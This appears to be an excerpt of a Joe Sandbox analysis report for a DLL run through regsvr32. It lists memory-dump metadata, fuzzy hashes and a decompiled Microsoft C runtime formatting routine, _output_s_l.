                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                                                    • String ID: @'C$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                                                    • API String ID: 4112623284-1094559166
                                                                    • Opcode ID: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                    • Instruction ID: 45fc69fecf93984735d9c4b87304ebe4c96837b84e7424b4db74fc1719c3d08d
                                                                    • Opcode Fuzzy Hash: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                    • Instruction Fuzzy Hash: 83911D36619B8586E7A08B19E98036E77E0F388798F654236EACD477B8CB3DD541CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                    • API String ID: 2123368286-3717698799
                                                                    • Opcode ID: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                    • Instruction ID: b28b411edc77ea5f57a42c4ce070c51137fe1cd7001121a3be123fc4e483bd38
                                                                    • Opcode Fuzzy Hash: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                                    • Instruction Fuzzy Hash: FC810D32A1DB8686DAB08B29E84476E73E0F385765F204225E6ED437E9DF3DD445CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 20%
                                                                    			E000007FE7FEF9D3C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                    				signed int _t212;
                                                                    				signed char _t217;
                                                                    				intOrPtr _t252;
                                                                    				signed int _t327;
                                                                    				signed int _t328;
                                                                    				signed long long _t331;
                                                                    				intOrPtr* _t354;
                                                                    				signed long long _t379;
                                                                    
                                                                    				_t327 = __rax;
                                                                    				_a708 = 0x27;
                                                                    				_a72 = 0x10;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                                    				_a84 = 0x30;
                                                                    				_a85 = _a708 + 0x51;
                                                                    				_a92 = 2;
                                                                    				_a72 = 8;
                                                                    				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                                    				asm("bts eax, 0x9");
                                                                    				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                                    				E000007FE7FEF9D31EA0( &_a1112);
                                                                    				_a824 = _t327;
                                                                    				goto 0xf9d3c84b;
                                                                    				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                                    				E000007FE7FEF9D31EA0( &_a1112);
                                                                    				_a824 = _t327;
                                                                    				goto 0xf9d3c84b;
                                                                    				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                                    				_t328 = E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t328;
                                                                    				goto 0xf9d3c80e;
                                                                    				E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t328;
                                                                    				goto 0xf9d3c84b;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                                    				E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t328;
                                                                    				goto 0xf9d3c84b;
                                                                    				E000007FE7FEF9D31E40( &_a1112);
                                                                    				_a824 = _t328;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                                    				if (_a824 >= 0) goto 0xf9d3c882;
                                                                    				_a832 =  ~_a824;
                                                                    				asm("bts eax, 0x8");
                                                                    				goto 0xf9d3c892;
                                                                    				_t331 = _a824;
                                                                    				_a832 = _t331;
                                                                    				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                                    				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                                    				_a832 = _a832 & _t331;
                                                                    				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                                    				_a116 = 1;
                                                                    				goto 0xf9d3c8f5;
                                                                    				_a80 = _a80 & 0xfffffff7;
                                                                    				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                                    				_a116 = 0x200;
                                                                    				if (_a832 != 0) goto 0xf9d3c908;
                                                                    				_a92 = 0;
                                                                    				_a64 =  &_a687;
                                                                    				_t212 = _a116;
                                                                    				_a116 = _a116 - 1;
                                                                    				if (_t212 > 0) goto 0xf9d3c936;
                                                                    				if (_a832 == 0) goto 0xf9d3c9d3;
                                                                    				_a1040 = _a72;
                                                                    				_a816 = _t212 / _a1040 + 0x30;
                                                                    				_a1048 = _a72;
                                                                    				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                                    				_t217 = _a816 + _a708;
                                                                    				_a816 = _t217;
                                                                    				 *_a64 = _a816 & 0x000000ff;
                                                                    				_a64 = _a64 - 1;
                                                                    				goto 0xf9d3c915;
                                                                    				_a104 = _t217;
                                                                    				_a64 = _a64 + 1;
                                                                    				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                                    				if (_a104 == 0) goto 0xf9d3ca12;
                                                                    				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                                    				_a64 = _a64 - 1;
                                                                    				 *_a64 = 0x30;
                                                                    				_a104 = _a104 + 1;
                                                                    				if (_a108 != 0) goto 0xf9d3cc6e;
                                                                    				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                                    				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                                    				_a84 = 0x2d;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ca95;
                                                                    				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                                    				_a84 = 0x2b;
                                                                    				_a92 = 1;
                                                                    				goto 0xf9d3ca95;
                                                                    				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                                    				_a84 = 0x20;
                                                                    				_a92 = 1;
                                                                    				_a840 = _a88 - _a104 - _a92;
                                                                    				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                    				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                    				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                                    				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                                    				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                                    				if (_a76 == 0) goto 0xf9d3cc1d;
                                                                    				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                                    				_a872 = 0;
                                                                    				_a848 = _a64;
                                                                    				_a856 = _a104;
                                                                    				_a856 = _a856 - 1;
                                                                    				if (_a856 == 0) goto 0xf9d3cc1b;
                                                                    				_a1056 =  *_a848 & 0x0000ffff;
                                                                    				r9d = _a1056 & 0x0000ffff;
                                                                    				r8d = 6;
                                                                    				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                                    				_a848 =  &(_a848[1]);
                                                                    				if (_a872 != 0) goto 0xf9d3cbe5;
                                                                    				if (_a860 != 0) goto 0xf9d3cbf2;
                                                                    				_a688 = 0xffffffff;
                                                                    				goto 0xf9d3cc1b;
                                                                    				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                    				goto 0xf9d3cb60;
                                                                    				goto 0xf9d3cc3b;
                                                                    				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                    				if (_a688 < 0) goto 0xf9d3cc6e;
                                                                    				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                                    				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                    				if (_a96 == 0) goto 0xf9d3cc8e;
                                                                    				0xf9d25330();
                                                                    				_a96 = 0;
                                                                    				goto 0xf9d3b99c;
                                                                    				if (_a704 == 0) goto 0xf9d3ccb4;
                                                                    				if (_a704 == 7) goto 0xf9d3ccb4;
                                                                    				_a1060 = 0;
                                                                    				goto 0xf9d3ccbf;
                                                                    				_a1060 = 1;
                                                                    				_t252 = _a1060;
                                                                    				_a876 = _t252;
                                                                    				if (_a876 != 0) goto 0xf9d3cd05;
                                                                    				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                    				_a32 = _t354;
                                                                    				r9d = 0;
                                                                    				r8d = 0x8f5;
                                                                    				0xf9d2b3b0();
                                                                    				if (_t252 != 1) goto 0xf9d3cd05;
                                                                    				asm("int3");
                                                                    				if (_a876 != 0) goto 0xf9d3cd61;
                                                                    				0xf9d2ab30();
                                                                    				 *_t354 = 0x16;
                                                                    				_a32 = 0;
                                                                    				r9d = 0x8f5;
                                                                    				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    				_a912 = 0xffffffff;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				goto 0xf9d3cd80;
                                                                    				_a916 = _a688;
                                                                    				E000007FE7FEF9D26800( &_a120);
                                                                    				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                    			}











                                                                    0x7fef9d3c719
                                                                    0x7fef9d3c719
                                                                    0x7fef9d3c724
                                                                    0x7fef9d3c737
                                                                    0x7fef9d3c739
                                                                    0x7fef9d3c748
                                                                    0x7fef9d3c74c
                                                                    0x7fef9d3c756
                                                                    0x7fef9d3c769
                                                                    0x7fef9d3c76f
                                                                    0x7fef9d3c782
                                                                    0x7fef9d3c78c
                                                                    0x7fef9d3c791
                                                                    0x7fef9d3c799
                                                                    0x7fef9d3c7a9
                                                                    0x7fef9d3c7b3
                                                                    0x7fef9d3c7b8
                                                                    0x7fef9d3c7c0
                                                                    0x7fef9d3c7ce
                                                                    0x7fef9d3c7d9
                                                                    0x7fef9d3c7e8
                                                                    0x7fef9d3c7ec
                                                                    0x7fef9d3c7f4
                                                                    0x7fef9d3c7fe
                                                                    0x7fef9d3c806
                                                                    0x7fef9d3c80e
                                                                    0x7fef9d3c819
                                                                    0x7fef9d3c823
                                                                    0x7fef9d3c82a
                                                                    0x7fef9d3c832
                                                                    0x7fef9d3c83c
                                                                    0x7fef9d3c843
                                                                    0x7fef9d3c854
                                                                    0x7fef9d3c85f
                                                                    0x7fef9d3c86c
                                                                    0x7fef9d3c878
                                                                    0x7fef9d3c880
                                                                    0x7fef9d3c882
                                                                    0x7fef9d3c88a
                                                                    0x7fef9d3c89d
                                                                    0x7fef9d3c8aa
                                                                    0x7fef9d3c8bf
                                                                    0x7fef9d3c8cc
                                                                    0x7fef9d3c8ce
                                                                    0x7fef9d3c8d6
                                                                    0x7fef9d3c8df
                                                                    0x7fef9d3c8eb
                                                                    0x7fef9d3c8ed
                                                                    0x7fef9d3c8fe
                                                                    0x7fef9d3c900
                                                                    0x7fef9d3c910
                                                                    0x7fef9d3c915
                                                                    0x7fef9d3c91f
                                                                    0x7fef9d3c925
                                                                    0x7fef9d3c930
                                                                    0x7fef9d3c93b
                                                                    0x7fef9d3c95e
                                                                    0x7fef9d3c96a
                                                                    0x7fef9d3c997
                                                                    0x7fef9d3c9a9
                                                                    0x7fef9d3c9ab
                                                                    0x7fef9d3c9bf
                                                                    0x7fef9d3c9c9
                                                                    0x7fef9d3c9ce
                                                                    0x7fef9d3c9e0
                                                                    0x7fef9d3c9ec
                                                                    0x7fef9d3c9fc
                                                                    0x7fef9d3ca03
                                                                    0x7fef9d3ca10
                                                                    0x7fef9d3ca1a
                                                                    0x7fef9d3ca24
                                                                    0x7fef9d3ca2d
                                                                    0x7fef9d3ca36
                                                                    0x7fef9d3ca45
                                                                    0x7fef9d3ca52
                                                                    0x7fef9d3ca54
                                                                    0x7fef9d3ca59
                                                                    0x7fef9d3ca61
                                                                    0x7fef9d3ca6c
                                                                    0x7fef9d3ca6e
                                                                    0x7fef9d3ca73
                                                                    0x7fef9d3ca7b
                                                                    0x7fef9d3ca86
                                                                    0x7fef9d3ca88
                                                                    0x7fef9d3ca8d
                                                                    0x7fef9d3caa5
                                                                    0x7fef9d3cab5
                                                                    0x7fef9d3cad0
                                                                    0x7fef9d3caee
                                                                    0x7fef9d3cafc
                                                                    0x7fef9d3cb07
                                                                    0x7fef9d3cb22
                                                                    0x7fef9d3cb2c
                                                                    0x7fef9d3cb37
                                                                    0x7fef9d3cb3d
                                                                    0x7fef9d3cb4d
                                                                    0x7fef9d3cb59
                                                                    0x7fef9d3cb70
                                                                    0x7fef9d3cb79
                                                                    0x7fef9d3cb8a
                                                                    0x7fef9d3cb92
                                                                    0x7fef9d3cb9b
                                                                    0x7fef9d3cbb6
                                                                    0x7fef9d3cbc9
                                                                    0x7fef9d3cbd9
                                                                    0x7fef9d3cbe3
                                                                    0x7fef9d3cbe5
                                                                    0x7fef9d3cbf0
                                                                    0x7fef9d3cc11
                                                                    0x7fef9d3cc16
                                                                    0x7fef9d3cc1b
                                                                    0x7fef9d3cc36
                                                                    0x7fef9d3cc43
                                                                    0x7fef9d3cc4e
                                                                    0x7fef9d3cc69
                                                                    0x7fef9d3cc74
                                                                    0x7fef9d3cc80
                                                                    0x7fef9d3cc85
                                                                    0x7fef9d3cc8e
                                                                    0x7fef9d3cc9b
                                                                    0x7fef9d3cca5
                                                                    0x7fef9d3cca7
                                                                    0x7fef9d3ccb2
                                                                    0x7fef9d3ccb4
                                                                    0x7fef9d3ccbf
                                                                    0x7fef9d3ccc6
                                                                    0x7fef9d3ccd5
                                                                    0x7fef9d3ccd7
                                                                    0x7fef9d3ccde
                                                                    0x7fef9d3cce3
                                                                    0x7fef9d3cce6
                                                                    0x7fef9d3ccf8
                                                                    0x7fef9d3cd00
                                                                    0x7fef9d3cd02
                                                                    0x7fef9d3cd0d
                                                                    0x7fef9d3cd0f
                                                                    0x7fef9d3cd14
                                                                    0x7fef9d3cd1a
                                                                    0x7fef9d3cd23
                                                                    0x7fef9d3cd3e
                                                                    0x7fef9d3cd43
                                                                    0x7fef9d3cd53
                                                                    0x7fef9d3cd5f
                                                                    0x7fef9d3cd68
                                                                    0x7fef9d3cd74
                                                                    0x7fef9d3cd97

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: get_int64_arg
                                                                    • String ID: '$0$9
                                                                    • API String ID: 1967237116-269856862
                                                                    • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                    • Instruction ID: b3eda79bc04a60fb7ee4a4011f7c31915f3bf9e4e3688118cbdbb277fe6e384d
                                                                    • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                    • Instruction Fuzzy Hash: 0D41B47260DAC187E7B58B19E8957AEB7E4F385791F100125EAC886B98DB7DE640CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                                                    • String ID: csm
                                                                    • API String ID: 2005287440-1018135373
                                                                    • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                                    • Instruction ID: 0432dbe60f42fc154ce83aeddd16286c3d94edaaa77ff7db33c77853d76fe5a2
                                                                    • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                                    • Instruction Fuzzy Hash: FB51A836608B8682DAA09B1AF49076E77E0F3C4B91F615125EBCD47BB5DF3AD444CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName__initmbctable
                                                                    • String ID: C:\Windows\System32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                                                    • API String ID: 3548084100-1254873407
                                                                    • Opcode ID: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                    • Instruction ID: 40487cdd99e7390fc7cfa00da240fffb72a0e4e16c6d4a8cb9187a6270b67cf4
                                                                    • Opcode Fuzzy Hash: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                                    • Instruction Fuzzy Hash: 09410C21A19A8281EA90CB19EC8136E77A0F7857A5F614626E6EE43BF4DF3ED144C701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                    • API String ID: 2123368286-3717698799
                                                                    • Opcode ID: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                                    • Instruction ID: db9b60f6e9b20c9f37adeee518bf084cd0881f5c38580f5bd04c1ce4cfd39116
                                                                    • Opcode Fuzzy Hash: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                                    • Instruction Fuzzy Hash: 49412931E1C7868AEAB08B24E84476E62E0F385365F604335D6ED427E5CB3EE444CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                    • API String ID: 2306298712-3864165772
                                                                    • Opcode ID: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                                    • Instruction ID: b637de57708ed2c7d115ffe7a667dd769ed1fe34c6e506efeb830bf347bff847
                                                                    • Opcode Fuzzy Hash: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                                    • Instruction Fuzzy Hash: D8313D32609BC585E7B08B19E84076EB3E1F385764F618225CAED877E4DB3DE405CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                    • API String ID: 2123368286-2562677240
                                                                    • Opcode ID: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                                    • Instruction ID: c85490607768c44f9eb9442c12c0ad7794bb5914cb74fa2bef1d73063ee62390
                                                                    • Opcode Fuzzy Hash: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                                    • Instruction Fuzzy Hash: 67311632A0DB8685EAB09B15E8407AEB7E1F385390F204625D6DD43BE8DB7ED444CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter$__doserrno
                                                                    • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                                                    • API String ID: 1181141450-2845860089
                                                                    • Opcode ID: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                                    • Instruction ID: a2d3a4357c877c10dbeba88c1570b3bcf2b7b0db3c51835aaf51b50bd6ce4727
                                                                    • Opcode Fuzzy Hash: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                                    • Instruction Fuzzy Hash: 25316D36A28A4286E7909B19E88476E77E0F380794F205125F6CE477F5CB7ED841CF42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                                                    • API String ID: 2123368286-160817255
                                                                    • Opcode ID: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                                    • Instruction ID: f81691e69628683e8e3df4f52d5e63bc79cedec177f2501b48199eede19b8a9f
                                                                    • Opcode Fuzzy Hash: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                                    • Instruction Fuzzy Hash: 7E218E71B2D6428AE7D89B24EC8476DB3E1F390395F609635E1DE476E4D77ED4018B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
